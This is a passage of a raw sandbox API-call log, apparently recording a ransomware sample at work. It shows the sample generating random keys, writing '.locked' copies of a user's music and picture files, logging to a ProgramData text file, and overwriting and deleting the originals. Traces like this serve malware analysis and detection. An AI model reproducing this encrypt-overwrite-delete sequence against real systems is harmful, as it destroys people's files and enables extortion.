dwMilliseconds=0xffffffff) returned 0x0 [0309.646] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0309.646] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0309.646] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0309.646] WriteFile (in: hFile=0x1c0, lpBuffer=0x123a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x123a7000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0309.648] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0309.652] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0309.652] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0309.653] SetEvent (hEvent=0x150) returned 1 [0309.653] SetEvent (hEvent=0x220) returned 1 [0309.653] SetEvent (hEvent=0x214) returned 1 [0309.653] SetEvent (hEvent=0x1e8) returned 1 [0309.653] ReadFile (in: hFile=0x218, lpBuffer=0x1634a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x1634a000*, lpNumberOfBytesRead=0x125e7d68*=0x5ad7, lpOverlapped=0x0) returned 1 [0309.655] WriteFile (in: hFile=0x1c0, lpBuffer=0x1634a000*, nNumberOfBytesToWrite=0x5ad7, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x1634a000*, lpNumberOfBytesWritten=0x125e7d74*=0x5ad7, lpOverlapped=0x0) returned 1 [0309.712] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.117] SetEvent (hEvent=0x150) returned 1 [0310.117] ReadFile (in: hFile=0x218, lpBuffer=0x1634a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x1634a000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0310.155] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.375] CloseHandle (hObject=0x1c0) returned 1 [0310.376] CloseHandle (hObject=0x218) returned 1 [0310.376] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0310.376] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0310.376] WriteFile (in: hFile=0x218, lpBuffer=0x12380200*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x12380200*, lpNumberOfBytesWritten=0x125e7e64*=0x3c, lpOverlapped=0x0) returned 1 [0310.376] CloseHandle (hObject=0x218) returned 1 [0310.377] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\62mMsJbyJlq 9a.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\62mmsjbyjlq 9a.wav")) returned 1 [0310.439] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\62mMsJbyJlq 9a.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\62mmsjbyjlq 9a.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0310.619] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.635] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0310.635] WriteFile (in: hFile=0x1b0, lpBuffer=0x12dee000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x12dee000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0310.659] CloseHandle (hObject=0x1b0) returned 1 [0310.659] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\62mMsJbyJlq 9a.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\62mmsjbyjlq 9a.wav")) returned 1 [0310.673] SetEvent (hEvent=0x220) returned 1 [0310.673] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.713] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12663a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12663a24*=0xc) returned 1 [0310.739] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.788] SetEvent (hEvent=0x198) returned 1 [0310.788] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.793] SetEvent (hEvent=0x21c) returned 1 [0310.793] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.856] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.879] SetEvent (hEvent=0x184) returned 1 [0310.879] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.927] SetEvent (hEvent=0x134) returned 1 [0310.927] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0310.939] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.939] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0310.942] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.943] SetEvent (hEvent=0x12c) returned 1 [0310.943] SetEvent (hEvent=0x1f0) returned 1 [0310.943] SetEvent (hEvent=0x1ac) returned 1 [0310.943] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.945] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0310.945] SetEvent (hEvent=0x150) returned 1 [0310.945] SetEvent (hEvent=0x1f0) returned 1 [0310.945] SetEvent (hEvent=0x1ac) returned 1 [0310.945] SetEvent (hEvent=0x12c) returned 1 [0310.945] SetEvent (hEvent=0x220) returned 1 [0310.945] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0310.961] SetEvent (hEvent=0x1ac) returned 1 [0310.961] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390240 | out: pbBuffer=0x12390240) returned 1 [0310.961] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x127660b0 | out: pbBuffer=0x127660b0) returned 1 [0310.961] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702401 | out: pbBuffer=0x12702401) returned 1 [0310.961] WriteFile (in: hFile=0x1c0, lpBuffer=0x1266e000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x1266e000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0310.964] ReadFile (in: hFile=0x19c, lpBuffer=0x14ebe000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x14ebe000*, lpNumberOfBytesRead=0x125e3d68*=0xca1f, lpOverlapped=0x0) returned 1 [0310.967] WriteFile (in: hFile=0x1c0, lpBuffer=0x14ebe000*, nNumberOfBytesToWrite=0xca1f, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x14ebe000*, lpNumberOfBytesWritten=0x125e3d74*=0xca1f, lpOverlapped=0x0) returned 1 [0310.973] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0311.193] ReadFile (in: hFile=0x19c, lpBuffer=0x14ebe000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x14ebe000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0311.193] CloseHandle (hObject=0x1c0) returned 1 [0311.194] CloseHandle (hObject=0x19c) returned 1 [0311.194] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0311.194] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0311.194] WriteFile (in: hFile=0x19c, lpBuffer=0x123a8150*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x123a8150*, lpNumberOfBytesWritten=0x125e3e64*=0x6c, lpOverlapped=0x0) returned 1 [0311.195] CloseHandle (hObject=0x19c) returned 1 [0311.195] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\GtPsnmjRu_gpfrBo.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\gtpsnmjru_gpfrbo.wav")) returned 1 [0311.370] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0311.370] SetEvent (hEvent=0x134) returned 1 [0311.370] SetEvent (hEvent=0x14c) returned 1 [0311.370] SetEvent (hEvent=0x220) returned 1 [0311.427] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\GtPsnmjRu_gpfrBo.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\gtpsnmjru_gpfrbo.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0311.505] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0311.696] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e3e88 | out: lpMode=0x125e3e88) returned 0 [0311.826] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.055] WriteFile (in: hFile=0x218, lpBuffer=0x14160000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e3e78, lpOverlapped=0x0 | out: lpBuffer=0x14160000*, lpNumberOfBytesWritten=0x125e3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.156] CloseHandle (hObject=0x218) returned 1 [0312.411] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.543] SetEvent (hEvent=0x1e8) returned 1 [0312.543] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.852] SetEvent (hEvent=0x22c) returned 1 [0312.852] SetEvent (hEvent=0x1f0) returned 1 [0312.852] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.861] SetEvent (hEvent=0x22c) returned 1 [0312.861] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.867] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0312.920] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.971] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.972] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.976] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\TwlVh5-7kS4lpqivPrW.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\twlvh5-7ks4lpqivprw.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0312.977] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125d9d9c | out: lpMode=0x125d9d9c) returned 0 [0312.977] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0312.977] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766050 | out: pbBuffer=0x12766050) returned 1 [0312.977] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c201 | out: pbBuffer=0x1237c201) returned 1 [0312.977] WriteFile (in: hFile=0x1e0, lpBuffer=0x12705000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x12705000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0312.987] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0312.988] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0312.988] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0312.989] SetEvent (hEvent=0x150) returned 1 [0312.989] SetEvent (hEvent=0x1f0) returned 1 [0312.989] SetEvent (hEvent=0x184) returned 1 [0312.989] SetEvent (hEvent=0x220) returned 1 [0312.989] ReadFile (in: hFile=0x1a4, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x125e7d68*=0xa639, lpOverlapped=0x0) returned 1 [0312.992] WriteFile (in: hFile=0x1e0, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0xa639, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x125e7d74*=0xa639, lpOverlapped=0x0) returned 1 [0313.000] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.010] SetEvent (hEvent=0x150) returned 1 [0313.010] ReadFile (in: hFile=0x1a4, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0313.011] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.052] CloseHandle (hObject=0x1e0) returned 1 [0313.052] CloseHandle (hObject=0x1a4) returned 1 [0313.052] SwitchToThread () returned 1 [0313.057] SetEvent (hEvent=0x20c) returned 1 [0313.057] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.058] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.149] SetEvent (hEvent=0x20c) returned 1 [0313.149] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.157] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.175] SetEvent (hEvent=0x220) returned 1 [0313.175] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0313.176] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x124a1e94 | out: lpMode=0x124a1e94) returned 0 [0313.176] WriteFile (in: hFile=0x230, lpBuffer=0x1264a180*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x124a1e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a180*, lpNumberOfBytesWritten=0x124a1e64*=0x3c, lpOverlapped=0x0) returned 1 [0313.176] CloseHandle (hObject=0x230) returned 1 [0313.176] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\TwlVh5-7kS4lpqivPrW.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\twlvh5-7ks4lpqivprw.bmp")) returned 1 [0313.181] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.398] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.400] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.444] SetEvent (hEvent=0x20c) returned 1 [0313.444] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.501] SetEvent (hEvent=0x1f0) returned 1 [0313.501] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.527] SetEvent (hEvent=0x184) returned 1 [0313.527] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0313.529] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.658] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.662] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.687] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.699] SetEvent (hEvent=0x184) returned 1 [0313.699] SetEvent (hEvent=0x214) returned 1 [0313.699] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.933] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0313.935] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.032] SetEvent (hEvent=0x220) returned 1 [0314.032] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0314.041] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.041] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x102 [0314.047] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.047] SetEvent (hEvent=0x184) returned 1 [0314.047] SetEvent (hEvent=0x220) returned 1 [0314.047] SetEvent (hEvent=0x22c) returned 1 [0314.047] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.052] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb34, ulCount=0x10, ulNumEntriesRemoved=0x332efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb34, ulNumEntriesRemoved=0x332efb14) returned 0 [0314.052] SetEvent (hEvent=0x150) returned 1 [0314.052] SetEvent (hEvent=0x22c) returned 1 [0314.053] SetEvent (hEvent=0x220) returned 1 [0314.053] WriteFile (in: hFile=0x218, lpBuffer=0x12aa8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e5e78, lpOverlapped=0x0 | out: lpBuffer=0x12aa8000*, lpNumberOfBytesWritten=0x125e5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.077] CloseHandle (hObject=0x218) returned 1 [0314.077] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\Dju4ZgDG1-unlMg\\A3FeS_cred _Q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\dju4zgdg1-unlmg\\a3fes_cred _q.bmp")) returned 1 [0314.085] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0314.086] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766090 | out: pbBuffer=0x12766090) returned 1 [0314.086] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340581 | out: pbBuffer=0x12340581) returned 1 [0314.086] WriteFile (in: hFile=0x1bc, lpBuffer=0x124a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x124a7000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0314.089] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x1) returned 0x0 [0314.090] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x332efb30, ulCount=0x10, ulNumEntriesRemoved=0x332efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x332efb30, ulNumEntriesRemoved=0x332efb10) returned 0 [0314.090] SetEvent (hEvent=0x150) returned 1 [0314.090] SetEvent (hEvent=0x184) returned 1 [0314.090] SetEvent (hEvent=0x14c) returned 1 [0314.090] ReadFile (in: hFile=0x230, lpBuffer=0x144f8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x144f8000*, lpNumberOfBytesRead=0x125e5d68*=0x127a1, lpOverlapped=0x0) returned 1 [0314.094] WriteFile (in: hFile=0x1bc, lpBuffer=0x144f8000*, nNumberOfBytesToWrite=0x127a1, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x144f8000*, lpNumberOfBytesWritten=0x125e5d74*=0x127a1, lpOverlapped=0x0) returned 1 [0314.102] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.149] ReadFile (in: hFile=0x230, lpBuffer=0x144f8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x144f8000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0314.149] CloseHandle (hObject=0x1bc) returned 1 [0314.150] CloseHandle (hObject=0x230) returned 1 [0314.150] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0314.150] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0314.150] WriteFile (in: hFile=0x230, lpBuffer=0x126ee310*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x126ee310*, lpNumberOfBytesWritten=0x125e5e64*=0x6e, lpOverlapped=0x0) returned 1 [0314.150] CloseHandle (hObject=0x230) returned 1 [0314.151] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\1MwQ46yFzkmbDV8forC.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\1mwq46yfzkmbdv8forc.png")) returned 1 [0314.153] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.244] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\1MwQ46yFzkmbDV8forC.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\1mwq46yfzkmbdv8forc.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0314.536] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.580] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0314.580] WriteFile (in: hFile=0x224, lpBuffer=0x15e04000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e5e78, lpOverlapped=0x0 | out: lpBuffer=0x15e04000*, lpNumberOfBytesWritten=0x125e5e78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.605] CloseHandle (hObject=0x224) returned 1 [0314.618] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.687] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\1MwQ46yFzkmbDV8forC.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\1mwq46yfzkmbdv8forc.png")) returned 1 [0314.758] SetEvent (hEvent=0x1dc) returned 1 [0314.758] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.771] SetEvent (hEvent=0x1e8) returned 1 [0314.771] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.823] SetEvent (hEvent=0x14c) returned 1 [0314.823] SetEvent (hEvent=0x184) returned 1 [0314.823] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.940] SetEvent (hEvent=0x220) returned 1 [0314.940] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0314.945] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.053] SetEvent (hEvent=0x214) returned 1 [0315.054] SetEvent (hEvent=0x1f0) returned 1 [0315.054] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.057] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0xffffffff) returned 0x0 [0315.106] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc0a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x125fc0a0*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0315.123] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\zOpDqT28-XSK3u\\6FI0Bk.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\zopdqt28-xsk3u\\6fi0bk.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0315.124] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0315.124] CreateFileW 